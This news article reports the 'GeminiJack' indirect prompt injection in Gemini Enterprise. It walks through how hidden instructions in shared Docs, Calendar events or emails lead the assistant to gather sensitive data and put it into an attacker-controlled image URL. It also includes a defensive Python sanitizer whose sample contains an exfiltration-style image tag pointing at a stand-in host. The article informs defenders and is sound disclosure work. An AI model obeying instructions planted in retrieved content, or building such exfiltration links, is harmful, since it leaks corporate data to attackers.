
Google Fixes Gemini Enterprise Flaw That Exposed Corporate Data

By Team-CWD, December 10, 2025
Google has patched a zero-click vulnerability in Gemini Enterprise that could lead to corporate data leaks.

The flaw was discovered in June 2025 by security researchers at Noma Security and reported to Google the same day.

Dubbed ‘GeminiJack’ by the researchers, it is an architectural weakness in Google Gemini Enterprise, Google’s set of corporate AI assistant tools, and in Vertex AI Search, a Google Cloud platform for building AI-powered search and recommendation experiences.

This weakness allows a type of indirect prompt injection: attackers can add malicious instructions to common documents in Gmail, Google Calendar, Google Documents, or any other Google Workspace component Gemini Enterprise has access to, in order to exfiltrate sensitive corporate information.

Exploiting this flaw does not require the target employee to click anywhere and does not trigger any security controls.

GeminiJack’s Attack Chain

The attacker only needs to embed hidden instructions inside a shared or externally contributed document to perform the attack.

Here is the breakdown of the attack chain’s main steps:

  1. Content poisoning: An attacker creates a seemingly harmless Google Doc, Calendar event or Gmail email containing hidden instructions for Gemini Enterprise to search for sensitive terms and embed results in an external image URL they control
  2. Trigger: A legitimate employee performs a routine search, unintentionally prompting the AI to process the attacker’s poisoned content
  3. AI execution: Gemini retrieves the attacker’s document, misinterprets the instructions as valid, and scans authorized Workspace data for the sensitive terms
  4. Exfiltration: The AI includes the attacker’s malicious image tag in its response. When loaded, the victim’s browser sends the stolen data to the attacker’s server via a standard HTTP request, bypassing traditional security checks
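
The exfiltration in step 4 depends on the client rendering an image reference found in the model's response. As an added example (not code from Noma Security, Google or this article), the Python filter below removes image references whose host is not on an allowlist before a response is rendered; the allowlisted host, the function names and the sample response are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only host this rendering surface may load images from.
ALLOWED_IMAGE_HOSTS = {"assets.corp.example"}

MD_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*<?([^)\s>]+)[^)]*\)")
HTML_IMG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)
SRC_ATTR = re.compile(
    r"""(?<![\w-])src\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE)


def is_allowed(url: str) -> bool:
    """Accept only absolute https URLs whose host is allowlisted."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:  # malformed URL: treat as untrusted
        return False
    return parts.scheme == "https" and parts.hostname in ALLOWED_IMAGE_HOSTS


def sanitize_response(text: str):
    """Return (safe_text, blocked_urls) for a response about to be rendered."""
    blocked = []

    def check(url: str, original: str) -> str:
        if is_allowed(url):
            return original
        blocked.append(url)  # keep for alerting: a blocked image is a signal
        return "[image removed]"

    def on_html(m):
        src = SRC_ATTR.search(m.group(0))
        url = next((g for g in src.groups() if g), "") if src else ""
        return check(url, m.group(0))

    text = MD_IMAGE.sub(lambda m: check(m.group(1), m.group(0)), text)
    return HTML_IMG.sub(on_html, text), blocked


# Constructed sample: a response carrying injected image references.
SAMPLE = (
    "Here is the summary you asked for.\n"
    '<img src="https://collector.example.net/p.png?d=budget%20figures">\n'
    "![chart](https://assets.corp.example/q4.png)\n"
    "![logo](//collector.example.net/l.png)"
)

if __name__ == "__main__":
    print(sanitize_response(SAMPLE))
```

Filtering the text is a second line of defense; the same allowlist belongs in the renderer itself, for example as a Content-Security-Policy `img-src` directive.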

This attack worked because Google Gemini Enterprise AI’s search feature implements a Retrieval-Augmented Generation (RAG) architecture that allows organizations to query across multiple data sources in Google Workspace.

“Organizations must pre-configure which data sources the RAG system can access. This pre-configuration step determines the scope of data available to the Gemini model during query processing. Once configured, the system has persistent access to these data sources for all user queries,” said the Noma Security researchers.

“The vulnerability exploits the trust boundary between user-controlled content in data sources and the AI model’s instruction processing. An attacker can plant malicious instructions within content that gets retrieved and processed by the RAG system.”

Noma Security shared a step-by-step proof-of-concept (PoC) exploit for this vulnerability in its report on GeminiJack, published on December 8.

Adoption of Corporate AI Brings Growing Indirect Prompt Injection Risk

Google confirmed receipt of the vulnerability report from Noma Security in August and started to work with them to fix it.

The tech giant deployed updates that changed how Gemini Enterprise and Vertex AI Search interact with their underlying retrieval and indexing systems.

After the discovery, Vertex AI Search was fully separated from Gemini Enterprise and no longer uses the same large language model (LLM)-powered workflows or RAG capabilities.

However, the Noma Security researchers expect that this attack will not be the last of its kind.

They stated that traditional perimeter defense controls, endpoint protection solutions and data loss prevention tools “weren’t designed to detect when your AI assistant becomes an exfiltration engine.”

“As AI agents gain broader access to corporate data and autonomy to act on instructions, the blast radius of a single vulnerability expands exponentially. Organizations deploying AI systems with access to sensitive data must carefully consider trust boundaries, implement robust monitoring and stay informed about emerging AI security research,” the Noma Security researchers concluded.

The UK’s National Cyber Security Centre (NCSC) recently shared new guidance to mitigate prompt injection attacks.


